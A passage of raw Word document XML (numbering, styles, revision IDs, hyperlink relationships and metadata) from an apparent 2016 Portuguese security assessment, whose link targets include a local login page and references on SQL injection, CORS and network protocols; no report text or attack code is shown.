  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0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 w15:restartNumberingAfterBreak="0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 w15:restartNumberingAfterBreak="0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18" w15:restartNumberingAfterBreak="0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9" w15:restartNumberingAfterBreak="0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0" w15:restartNumberingAfterBreak="0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 w15:restartNumberingAfterBreak="0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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="60252509"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="27D21966"/>
    <w:lvl w:ilvl="0" w:tplc="C8F4D2F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
      </w:r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4" w15:restartNumberingAfterBreak="0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5" w15:restartNumberingAfterBreak="0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6" w15:restartNumberingAfterBreak="0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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D5624C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A14DB52"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3408" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3573" w:hanging="525"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="376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4128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4128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488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848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848" w:hanging="1800"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0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6"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7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8">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="8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6AB"/>
    <w:rsid w:val="000062FF"/>
    <w:rsid w:val="00013EA5"/>
    <w:rsid w:val="00015DE3"/>
    <w:rsid w:val="00022ED2"/>
    <w:rsid w:val="00025045"/>
    <w:rsid w:val="00036A5D"/>
    <w:rsid w:val="00046E12"/>
    <w:rsid w:val="00052A31"/>
    <w:rsid w:val="000536AA"/>
    <w:rsid w:val="0005686A"/>
    <w:rsid w:val="00057B33"/>
    <w:rsid w:val="000673F6"/>
    <w:rsid w:val="00087FBC"/>
    <w:rsid w:val="00093CAB"/>
    <w:rsid w:val="000A6729"/>
    <w:rsid w:val="000C72B3"/>
    <w:rsid w:val="000D038A"/>
    <w:rsid w:val="000D3326"/>
    <w:rsid w:val="000D4E90"/>
    <w:rsid w:val="000E26E7"/>
    <w:rsid w:val="000E2EE2"/>
    <w:rsid w:val="000E35CD"/>
    <w:rsid w:val="000E6FA1"/>
    <w:rsid w:val="000F06E4"/>
    <w:rsid w:val="00101063"/>
    <w:rsid w:val="001031B5"/>
    <w:rsid w:val="001151C8"/>
    <w:rsid w:val="001247A7"/>
    <w:rsid w:val="001557DC"/>
    <w:rsid w:val="001609AB"/>
    <w:rsid w:val="001702C9"/>
    <w:rsid w:val="00174603"/>
    <w:rsid w:val="00174B27"/>
    <w:rsid w:val="00184BA7"/>
    <w:rsid w:val="00185ED4"/>
    <w:rsid w:val="00190AAD"/>
    <w:rsid w:val="00191402"/>
    <w:rsid w:val="001923D7"/>
    <w:rsid w:val="001968AD"/>
    <w:rsid w:val="00196FF2"/>
    <w:rsid w:val="00197C78"/>
    <w:rsid w:val="001A5B8E"/>
    <w:rsid w:val="001A5DFB"/>
    <w:rsid w:val="001B2F09"/>
    <w:rsid w:val="001C4F4D"/>
    <w:rsid w:val="001C7028"/>
    <w:rsid w:val="001D6374"/>
    <w:rsid w:val="001E29F7"/>
    <w:rsid w:val="001F4C0E"/>
    <w:rsid w:val="001F5050"/>
    <w:rsid w:val="00201EA5"/>
    <w:rsid w:val="0020416E"/>
    <w:rsid w:val="00204E77"/>
    <w:rsid w:val="00211EF9"/>
    <w:rsid w:val="002151B5"/>
    <w:rsid w:val="00224FD8"/>
    <w:rsid w:val="00236FDF"/>
    <w:rsid w:val="00240857"/>
    <w:rsid w:val="0024287E"/>
    <w:rsid w:val="0024453B"/>
    <w:rsid w:val="00265100"/>
    <w:rsid w:val="00265310"/>
    <w:rsid w:val="00271556"/>
    <w:rsid w:val="002719E7"/>
    <w:rsid w:val="0027244F"/>
    <w:rsid w:val="00284BB3"/>
    <w:rsid w:val="00294FE0"/>
    <w:rsid w:val="0029632F"/>
    <w:rsid w:val="00296685"/>
    <w:rsid w:val="002A0DD8"/>
    <w:rsid w:val="002A5CE5"/>
    <w:rsid w:val="002B1EF3"/>
    <w:rsid w:val="002C0836"/>
    <w:rsid w:val="002C467E"/>
    <w:rsid w:val="002C52C4"/>
    <w:rsid w:val="002D16A4"/>
    <w:rsid w:val="002D20FB"/>
    <w:rsid w:val="002D3D74"/>
    <w:rsid w:val="002D4365"/>
    <w:rsid w:val="002E34E0"/>
    <w:rsid w:val="00310E6C"/>
    <w:rsid w:val="00311F69"/>
    <w:rsid w:val="003164B7"/>
    <w:rsid w:val="003178EE"/>
    <w:rsid w:val="00322A98"/>
    <w:rsid w:val="00323A19"/>
    <w:rsid w:val="003243CE"/>
    <w:rsid w:val="003249F0"/>
    <w:rsid w:val="00337476"/>
    <w:rsid w:val="0036432A"/>
    <w:rsid w:val="003745C8"/>
    <w:rsid w:val="00384949"/>
    <w:rsid w:val="00384E80"/>
    <w:rsid w:val="003A39F6"/>
    <w:rsid w:val="003A5422"/>
    <w:rsid w:val="003B06CC"/>
    <w:rsid w:val="003B3BB8"/>
    <w:rsid w:val="003D0913"/>
    <w:rsid w:val="003D141C"/>
    <w:rsid w:val="003D23F9"/>
    <w:rsid w:val="003D4E1D"/>
    <w:rsid w:val="003E1ACB"/>
    <w:rsid w:val="003E38DF"/>
    <w:rsid w:val="003E4BBF"/>
    <w:rsid w:val="003E7654"/>
    <w:rsid w:val="003F0DBB"/>
    <w:rsid w:val="003F3756"/>
    <w:rsid w:val="003F40A0"/>
    <w:rsid w:val="003F4807"/>
    <w:rsid w:val="003F56AB"/>
    <w:rsid w:val="003F64B7"/>
    <w:rsid w:val="0040058D"/>
    <w:rsid w:val="00412443"/>
    <w:rsid w:val="00415B47"/>
    <w:rsid w:val="00417333"/>
    <w:rsid w:val="00430E45"/>
    <w:rsid w:val="00455AB7"/>
    <w:rsid w:val="00456110"/>
    <w:rsid w:val="0045732E"/>
    <w:rsid w:val="004741DB"/>
    <w:rsid w:val="00477883"/>
    <w:rsid w:val="0048383A"/>
    <w:rsid w:val="004850DA"/>
    <w:rsid w:val="0049098B"/>
    <w:rsid w:val="0049317F"/>
    <w:rsid w:val="004B1DCC"/>
    <w:rsid w:val="004B4607"/>
    <w:rsid w:val="004C1B81"/>
    <w:rsid w:val="004C783E"/>
    <w:rsid w:val="004D25DD"/>
    <w:rsid w:val="004E0A86"/>
    <w:rsid w:val="004E12C9"/>
    <w:rsid w:val="004E1803"/>
    <w:rsid w:val="004E2307"/>
    <w:rsid w:val="004F3071"/>
    <w:rsid w:val="004F40AA"/>
    <w:rsid w:val="00503644"/>
    <w:rsid w:val="00510DD2"/>
    <w:rsid w:val="005135D8"/>
    <w:rsid w:val="00517685"/>
    <w:rsid w:val="00530877"/>
    <w:rsid w:val="005352FA"/>
    <w:rsid w:val="00537F7B"/>
    <w:rsid w:val="00544368"/>
    <w:rsid w:val="00546F66"/>
    <w:rsid w:val="00557D26"/>
    <w:rsid w:val="00564674"/>
    <w:rsid w:val="00564D7D"/>
    <w:rsid w:val="00567ED2"/>
    <w:rsid w:val="00572A0D"/>
    <w:rsid w:val="00594AD8"/>
    <w:rsid w:val="005967D5"/>
    <w:rsid w:val="005A089C"/>
    <w:rsid w:val="005A5292"/>
    <w:rsid w:val="005A68AB"/>
    <w:rsid w:val="005B3078"/>
    <w:rsid w:val="005B5243"/>
    <w:rsid w:val="005D3B2A"/>
    <w:rsid w:val="005D6685"/>
    <w:rsid w:val="005D6A2A"/>
    <w:rsid w:val="005E239F"/>
    <w:rsid w:val="005E45A3"/>
    <w:rsid w:val="005F4015"/>
    <w:rsid w:val="005F470B"/>
    <w:rsid w:val="005F6E06"/>
    <w:rsid w:val="005F79D1"/>
    <w:rsid w:val="006035EF"/>
    <w:rsid w:val="00603B2C"/>
    <w:rsid w:val="00605CFE"/>
    <w:rsid w:val="006071F5"/>
    <w:rsid w:val="00623C1F"/>
    <w:rsid w:val="0062442F"/>
    <w:rsid w:val="00626AC7"/>
    <w:rsid w:val="00630433"/>
    <w:rsid w:val="0063700A"/>
    <w:rsid w:val="00640C50"/>
    <w:rsid w:val="00641283"/>
    <w:rsid w:val="006473CA"/>
    <w:rsid w:val="00650630"/>
    <w:rsid w:val="006515FB"/>
    <w:rsid w:val="00654CAB"/>
    <w:rsid w:val="00654DEF"/>
    <w:rsid w:val="006612A3"/>
    <w:rsid w:val="006635A8"/>
    <w:rsid w:val="00670E3E"/>
    <w:rsid w:val="00676E62"/>
    <w:rsid w:val="0068102E"/>
    <w:rsid w:val="006853AA"/>
    <w:rsid w:val="006876BB"/>
    <w:rsid w:val="006A38D8"/>
    <w:rsid w:val="006A578B"/>
    <w:rsid w:val="006B700D"/>
    <w:rsid w:val="006C08DA"/>
    <w:rsid w:val="006C21E3"/>
    <w:rsid w:val="006C2DFF"/>
    <w:rsid w:val="006C31FD"/>
    <w:rsid w:val="006D580D"/>
    <w:rsid w:val="006D73FC"/>
    <w:rsid w:val="006E2559"/>
    <w:rsid w:val="006F6948"/>
    <w:rsid w:val="006F6982"/>
    <w:rsid w:val="00702C53"/>
    <w:rsid w:val="007067BC"/>
    <w:rsid w:val="0070782B"/>
    <w:rsid w:val="00707948"/>
    <w:rsid w:val="00707E1B"/>
    <w:rsid w:val="007260B8"/>
    <w:rsid w:val="00736DBC"/>
    <w:rsid w:val="0074275B"/>
    <w:rsid w:val="00751591"/>
    <w:rsid w:val="00762DFF"/>
    <w:rsid w:val="00763063"/>
    <w:rsid w:val="0076417A"/>
    <w:rsid w:val="007649FC"/>
    <w:rsid w:val="00765ACB"/>
    <w:rsid w:val="00771369"/>
    <w:rsid w:val="00777DDF"/>
    <w:rsid w:val="007804EC"/>
    <w:rsid w:val="00790EC9"/>
    <w:rsid w:val="00791E90"/>
    <w:rsid w:val="007A267D"/>
    <w:rsid w:val="007D3513"/>
    <w:rsid w:val="007E2011"/>
    <w:rsid w:val="007E46A7"/>
    <w:rsid w:val="007F5D29"/>
    <w:rsid w:val="00801C36"/>
    <w:rsid w:val="00807BFC"/>
    <w:rsid w:val="00817857"/>
    <w:rsid w:val="00824DA2"/>
    <w:rsid w:val="00825FE5"/>
    <w:rsid w:val="00827015"/>
    <w:rsid w:val="00830E80"/>
    <w:rsid w:val="00831A3E"/>
    <w:rsid w:val="00834FAA"/>
    <w:rsid w:val="00837F79"/>
    <w:rsid w:val="00846A20"/>
    <w:rsid w:val="0084777A"/>
    <w:rsid w:val="00857C40"/>
    <w:rsid w:val="00870818"/>
    <w:rsid w:val="008719F1"/>
    <w:rsid w:val="00881DA5"/>
    <w:rsid w:val="00885145"/>
    <w:rsid w:val="008872A1"/>
    <w:rsid w:val="00892814"/>
    <w:rsid w:val="00892BCB"/>
    <w:rsid w:val="008A7473"/>
    <w:rsid w:val="008A79EE"/>
    <w:rsid w:val="008A7BB2"/>
    <w:rsid w:val="008B447D"/>
    <w:rsid w:val="008C2F72"/>
    <w:rsid w:val="008C6DC7"/>
    <w:rsid w:val="008D02E1"/>
    <w:rsid w:val="008D0530"/>
    <w:rsid w:val="00902307"/>
    <w:rsid w:val="00906B58"/>
    <w:rsid w:val="00915C31"/>
    <w:rsid w:val="00925B9A"/>
    <w:rsid w:val="00930BEA"/>
    <w:rsid w:val="00934569"/>
    <w:rsid w:val="00935C82"/>
    <w:rsid w:val="0094228B"/>
    <w:rsid w:val="00944F31"/>
    <w:rsid w:val="00945AD3"/>
    <w:rsid w:val="00967B9F"/>
    <w:rsid w:val="00985A8F"/>
    <w:rsid w:val="009A2041"/>
    <w:rsid w:val="009A6B56"/>
    <w:rsid w:val="009A7448"/>
    <w:rsid w:val="009B1DC9"/>
    <w:rsid w:val="009B63C8"/>
    <w:rsid w:val="009B7BA9"/>
    <w:rsid w:val="009C102E"/>
    <w:rsid w:val="009C3F25"/>
    <w:rsid w:val="009C4FBC"/>
    <w:rsid w:val="009C5396"/>
    <w:rsid w:val="009C7901"/>
    <w:rsid w:val="009D0F86"/>
    <w:rsid w:val="009E0E00"/>
    <w:rsid w:val="009F24CC"/>
    <w:rsid w:val="009F30B5"/>
    <w:rsid w:val="009F42DE"/>
    <w:rsid w:val="009F7A3C"/>
    <w:rsid w:val="00A03082"/>
    <w:rsid w:val="00A13973"/>
    <w:rsid w:val="00A206ED"/>
    <w:rsid w:val="00A218DE"/>
    <w:rsid w:val="00A24E0E"/>
    <w:rsid w:val="00A338A6"/>
    <w:rsid w:val="00A40129"/>
    <w:rsid w:val="00A63EAA"/>
    <w:rsid w:val="00A66072"/>
    <w:rsid w:val="00A83EB9"/>
    <w:rsid w:val="00A93306"/>
    <w:rsid w:val="00A93C57"/>
    <w:rsid w:val="00A9523B"/>
    <w:rsid w:val="00A966EC"/>
    <w:rsid w:val="00AA00BE"/>
    <w:rsid w:val="00AB1C01"/>
    <w:rsid w:val="00AB57A1"/>
    <w:rsid w:val="00AB5BB3"/>
    <w:rsid w:val="00AB70E4"/>
    <w:rsid w:val="00AC10DC"/>
    <w:rsid w:val="00AF248B"/>
    <w:rsid w:val="00AF4680"/>
    <w:rsid w:val="00B01036"/>
    <w:rsid w:val="00B04AF1"/>
    <w:rsid w:val="00B135C4"/>
    <w:rsid w:val="00B15531"/>
    <w:rsid w:val="00B17B93"/>
    <w:rsid w:val="00B25D43"/>
    <w:rsid w:val="00B3361B"/>
    <w:rsid w:val="00B42017"/>
    <w:rsid w:val="00B51059"/>
    <w:rsid w:val="00B560B0"/>
    <w:rsid w:val="00B71318"/>
    <w:rsid w:val="00B7146E"/>
    <w:rsid w:val="00B71A0F"/>
    <w:rsid w:val="00B800D4"/>
    <w:rsid w:val="00B846D4"/>
    <w:rsid w:val="00B854D0"/>
    <w:rsid w:val="00B959F5"/>
    <w:rsid w:val="00BA5C02"/>
    <w:rsid w:val="00BA7CEE"/>
    <w:rsid w:val="00BB751B"/>
    <w:rsid w:val="00BC05C8"/>
    <w:rsid w:val="00BC1742"/>
    <w:rsid w:val="00BC1926"/>
    <w:rsid w:val="00BC5B4A"/>
    <w:rsid w:val="00BC5DD9"/>
    <w:rsid w:val="00BD2955"/>
    <w:rsid w:val="00BD33F6"/>
    <w:rsid w:val="00BE4C3F"/>
    <w:rsid w:val="00BE58C0"/>
    <w:rsid w:val="00BF1C7D"/>
    <w:rsid w:val="00BF5785"/>
    <w:rsid w:val="00BF6E55"/>
    <w:rsid w:val="00C0198A"/>
    <w:rsid w:val="00C07952"/>
    <w:rsid w:val="00C07971"/>
    <w:rsid w:val="00C12C3D"/>
    <w:rsid w:val="00C306C8"/>
    <w:rsid w:val="00C32280"/>
    <w:rsid w:val="00C343E2"/>
    <w:rsid w:val="00C366F7"/>
    <w:rsid w:val="00C36925"/>
    <w:rsid w:val="00C3730D"/>
    <w:rsid w:val="00C52360"/>
    <w:rsid w:val="00C52795"/>
    <w:rsid w:val="00C624EB"/>
    <w:rsid w:val="00C815A6"/>
    <w:rsid w:val="00C8356E"/>
    <w:rsid w:val="00C86D69"/>
    <w:rsid w:val="00C97F3F"/>
    <w:rsid w:val="00CA5E41"/>
    <w:rsid w:val="00CB425C"/>
    <w:rsid w:val="00CC2CE7"/>
    <w:rsid w:val="00CC3790"/>
    <w:rsid w:val="00CD0164"/>
    <w:rsid w:val="00CD779F"/>
    <w:rsid w:val="00CE03DD"/>
    <w:rsid w:val="00CE2FCC"/>
    <w:rsid w:val="00CE3185"/>
    <w:rsid w:val="00CE5109"/>
    <w:rsid w:val="00CE679F"/>
    <w:rsid w:val="00D02F49"/>
    <w:rsid w:val="00D04B46"/>
    <w:rsid w:val="00D20770"/>
    <w:rsid w:val="00D24FC5"/>
    <w:rsid w:val="00D32318"/>
    <w:rsid w:val="00D4218C"/>
    <w:rsid w:val="00D43F1D"/>
    <w:rsid w:val="00D44803"/>
    <w:rsid w:val="00D45386"/>
    <w:rsid w:val="00D46C6B"/>
    <w:rsid w:val="00D50B6F"/>
    <w:rsid w:val="00D57137"/>
    <w:rsid w:val="00D602EF"/>
    <w:rsid w:val="00D60336"/>
    <w:rsid w:val="00D62225"/>
    <w:rsid w:val="00D65D65"/>
    <w:rsid w:val="00D76012"/>
    <w:rsid w:val="00D77DFF"/>
    <w:rsid w:val="00D918FF"/>
    <w:rsid w:val="00D967F2"/>
    <w:rsid w:val="00D975CE"/>
    <w:rsid w:val="00DB70B5"/>
    <w:rsid w:val="00DD39B4"/>
    <w:rsid w:val="00DD5893"/>
    <w:rsid w:val="00DE2F1B"/>
    <w:rsid w:val="00DF0646"/>
    <w:rsid w:val="00E01CAE"/>
    <w:rsid w:val="00E068E6"/>
    <w:rsid w:val="00E15301"/>
    <w:rsid w:val="00E158B8"/>
    <w:rsid w:val="00E16F18"/>
    <w:rsid w:val="00E27C4B"/>
    <w:rsid w:val="00E31790"/>
    <w:rsid w:val="00E400F9"/>
    <w:rsid w:val="00E4538D"/>
    <w:rsid w:val="00E453D6"/>
    <w:rsid w:val="00E513AC"/>
    <w:rsid w:val="00E52417"/>
    <w:rsid w:val="00E52521"/>
    <w:rsid w:val="00E650F5"/>
    <w:rsid w:val="00E77F75"/>
    <w:rsid w:val="00E92559"/>
    <w:rsid w:val="00E92ED1"/>
    <w:rsid w:val="00E9423C"/>
    <w:rsid w:val="00E95ED3"/>
    <w:rsid w:val="00EB09F2"/>
    <w:rsid w:val="00EC2366"/>
    <w:rsid w:val="00EC5D2B"/>
    <w:rsid w:val="00ED180C"/>
    <w:rsid w:val="00ED7438"/>
    <w:rsid w:val="00EF59CB"/>
    <w:rsid w:val="00F018F3"/>
    <w:rsid w:val="00F02825"/>
    <w:rsid w:val="00F04EFF"/>
    <w:rsid w:val="00F05851"/>
    <w:rsid w:val="00F149B2"/>
    <w:rsid w:val="00F15B60"/>
    <w:rsid w:val="00F15F82"/>
    <w:rsid w:val="00F248C0"/>
    <w:rsid w:val="00F24DE3"/>
    <w:rsid w:val="00F31428"/>
    <w:rsid w:val="00F3154F"/>
    <w:rsid w:val="00F52870"/>
    <w:rsid w:val="00F5692A"/>
    <w:rsid w:val="00F6048E"/>
    <w:rsid w:val="00F71E4B"/>
    <w:rsid w:val="00F8563B"/>
    <w:rsid w:val="00F87AAF"/>
    <w:rsid w:val="00F935DA"/>
    <w:rsid w:val="00FA1088"/>
    <w:rsid w:val="00FB2992"/>
    <w:rsid w:val="00FB3CB1"/>
    <w:rsid w:val="00FC374A"/>
    <w:rsid w:val="00FC41D3"/>
    <w:rsid w:val="00FD3807"/>
    <w:rsid w:val="00FE4996"/>
    <w:rsid w:val="00FE6FEB"/>
    <w:rsid w:val="00FF1C9C"/>
    <w:rsid w:val="00FF400C"/>
    <w:rsid w:val="00FF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05FF522-6279-4145-A3D6-497268E03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DC7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading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4287E"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E92ED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DBC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Footer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DBC"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading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lutation">
    <w:name w:val="Salutation"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SalutationChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SalutationChar">
    <w:name w:val="Salutation Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Salutation"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet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BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F307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F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextIndentChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F3071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F3071"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Referncia">
    <w:name w:val="Referência"/>
    <w:basedOn w:val="BodyText"/>
    <w:rsid w:val="004F3071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4F3071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4F3071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4F3071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4F3071"/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4F3071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8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21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.58/vacina/login.php?logado=false" TargetMode="External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hyperlink" Target="https://pt.wikipedia.org/wiki/NetBIOS" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3.org/TR/cors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hyperlink" Target="https://pt.wikipedia.org/wiki/Network_Time_Protoco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image" Target="media/image32.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/cc736675(v=ws.10).as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hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://docs.oracle.com/cd/B28359_01/appdev.111/b28370/commen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://software.dzhuvinov.com/cors-filter.html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192.168.0.58/vacina/index.php?pg=servidores" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackertarget.com/sqlmap-post-request-injection/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/pt-br/library/ms188621(v=sql.105)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hyperlink" Target="https://www.teamsid.com/worst-passwords-2015/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pt.wikipedia.org/wiki/Simple_Network_Management_Protocol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://dev.mysql.com/doc/refman/5.7/en/comment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BD86D3-3CF5-4AB1-8EE2-2C13F90FB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9075</Words>
  <Characters>49010</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>408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Pâmela Beatriz Lins De Souza</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-17T18:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-17T18:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>